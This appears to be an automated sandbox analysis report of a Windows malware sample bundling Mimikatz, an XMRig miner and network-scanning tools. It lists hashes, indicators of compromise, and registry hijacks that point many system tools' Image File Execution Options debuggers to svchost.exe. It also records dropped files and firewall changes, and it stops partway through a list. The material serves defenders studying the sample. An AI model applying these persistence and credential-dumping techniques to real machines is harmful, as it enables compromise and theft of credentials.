Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2024 07:03
Behavioral task
behavioral1
Sample
2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe
-
Size
9.2MB
-
MD5
876ab1881b7fdd8d327e4b57351c4cd6
-
SHA1
37b78162118afee815b954a43e15151f1805fc90
-
SHA256
ce0c0ca25048b1ae8de61bc361b110198660e32709fbc8b4472a23c747e4d959
-
SHA512
17e322807778b554251d2e4a5aa19a829fd016d7e79010092d1dba57b65df39dd1ccef60c6ee916441a8594aafccb5d082c773cbbe5280bd499800ec33b05450
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
tmyfwky.exedescription pid Process procid_target PID 3184 created 2060 3184 tmyfwky.exe 37 -
Contacts a large (18640) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/1412-178-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-183-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-201-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-212-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-223-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-234-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-247-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-255-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-264-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig behavioral2/memory/1412-373-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4280-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4280-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023caa-6.dat mimikatz behavioral2/memory/2400-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/672-138-0x00007FF6BD6B0000-0x00007FF6BD79E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
tmyfwky.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts tmyfwky.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts tmyfwky.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
tmyfwky.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tmyfwky.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 952 netsh.exe 556 netsh.exe -
Executes dropped EXE 26 IoCs
Processes:
tmyfwky.exetmyfwky.exewpcap.exebzbnzbyct.exevfshost.execmzbnyytn.exexohudmc.exeskaikk.exelfbpkn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.execmzbnyytn.exetmyfwky.execmzbnyytn.execmzbnyytn.exemidctcinn.exepid Process 2400 tmyfwky.exe 3184 tmyfwky.exe 3524 wpcap.exe 2000 bzbnzbyct.exe 672 vfshost.exe 3468 cmzbnyytn.exe 1792 xohudmc.exe 3940 skaikk.exe 1412 lfbpkn.exe 2684 cmzbnyytn.exe 3728 cmzbnyytn.exe 4572 cmzbnyytn.exe 4928 cmzbnyytn.exe 1384 cmzbnyytn.exe 2328 cmzbnyytn.exe 4824 cmzbnyytn.exe 4996 cmzbnyytn.exe 4956 cmzbnyytn.exe 4496 cmzbnyytn.exe 5044 cmzbnyytn.exe 2432 cmzbnyytn.exe 2344 cmzbnyytn.exe 2244 tmyfwky.exe 1964 cmzbnyytn.exe 2796 cmzbnyytn.exe 2196 midctcinn.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebzbnzbyct.exepid Process 3524 wpcap.exe 3524 wpcap.exe 3524 wpcap.exe 3524 wpcap.exe 3524 wpcap.exe 3524 wpcap.exe 3524 wpcap.exe 3524 wpcap.exe 3524 wpcap.exe 2000 bzbnzbyct.exe 2000 bzbnzbyct.exe 2000 bzbnzbyct.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 70 ifconfig.me 71 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
tmyfwky.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF tmyfwky.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\skaikk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tmyfwky.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tmyfwky.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\skaikk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tmyfwky.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023cf6-136.dat upx behavioral2/memory/672-135-0x00007FF6BD6B0000-0x00007FF6BD79E000-memory.dmp upx behavioral2/memory/672-138-0x00007FF6BD6B0000-0x00007FF6BD79E000-memory.dmp upx behavioral2/files/0x0007000000023d01-141.dat upx behavioral2/memory/3468-142-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/3468-146-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-164-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/files/0x0007000000023cfe-163.dat upx behavioral2/memory/2684-172-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/3728-176-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-178-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/4572-181-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-183-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/4928-187-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1384-191-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/2328-195-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/4824-199-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-201-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/4996-204-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/4956-208-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-212-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/4496-213-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/5044-217-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/2432-221-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-223-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/2344-226-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1964-233-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-234-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/2796-236-0x00007FF780140000-0x00007FF78019B000-memory.dmp upx behavioral2/memory/1412-247-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/1412-255-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/1412-264-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx behavioral2/memory/1412-373-0x00007FF6996D0000-0x00007FF6997F0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
tmyfwky.exe2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exemidctcinn.execmd.exedescription ioc Process File created C:\Windows\itcctjlje\upbdrjv\swrpwe.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\exma-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ssleay32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trch-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\vimpcsvc.xml tmyfwky.exe File created C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libeay32.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\libxml2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\ucl.dll tmyfwky.exe File created C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File created C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File created C:\Windows\cbdnbivt\tmyfwky.exe 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe File created C:\Windows\itcctjlje\UnattendGC\specials\cnli-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\docmicfg.xml tmyfwky.exe File opened for modification C:\Windows\itcctjlje\unptrtjvi\Result.txt midctcinn.exe File created C:\Windows\itcctjlje\UnattendGC\specials\xdvl-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\zlib1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\Shellcode.ini tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File opened for modification C:\Windows\itcctjlje\unptrtjvi\Packet.dll tmyfwky.exe File created C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\vfshost.exe tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\mimilib.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tibe-2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.xml tmyfwky.exe File created C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\schoedcl.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\AppCapture64.dll tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\trfo-2.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\spoolsrv.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.xml tmyfwky.exe File created C:\Windows\ime\tmyfwky.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.exe tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\Corporate\mimidrv.sys tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\tmyfwky.exe 2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exe File created C:\Windows\itcctjlje\UnattendGC\specials\crli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\tucl-1.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\schoedcl.xml tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\vimpcsvc.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\posh-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\svschost.exe tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\coli-0.dll tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.exe tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\wpcap.exe tmyfwky.exe File opened for modification C:\Windows\cbdnbivt\spoolsrv.xml tmyfwky.exe File opened for modification C:\Windows\itcctjlje\Corporate\log.txt cmd.exe File created C:\Windows\itcctjlje\UnattendGC\svschost.xml tmyfwky.exe File created C:\Windows\itcctjlje\UnattendGC\docmicfg.xml tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\ip.txt tmyfwky.exe File created C:\Windows\itcctjlje\unptrtjvi\scan.bat tmyfwky.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 4832 sc.exe 4308 sc.exe 4796 sc.exe 672 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
net.exenetsh.execmd.exe2024-10-11_876ab1881b7fdd8d327e4b57351c4cd6_hacktools_icedid_mimikatz.exenet.exenet.execmd.execmd.exenet.exenet1.execmd.exebzbnzbyct.exeschtasks.exenet1.execmd.exenet.exeschtasks.exesc.exenet1.execmd.execmd.execacls.exexohudmc.execmd.execmd.execmd.exenet.execacls.exetmyfwky.exenetsh.execmd.execacls.exenet.execmd.exenetsh.execmd.exesc.exemidctcinn.execmd.exenet1.execmd.exenet1.exenet.execmd.exenetsh.exenetsh.exesc.execacls.exenetsh.exenet.exenetsh.exenet1.exenet1.exenetsh.exenetsh.execmd.exenet1.exePING.EXEcmd.exenet.exenetsh.exeskaikk.execmd.exewpcap.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 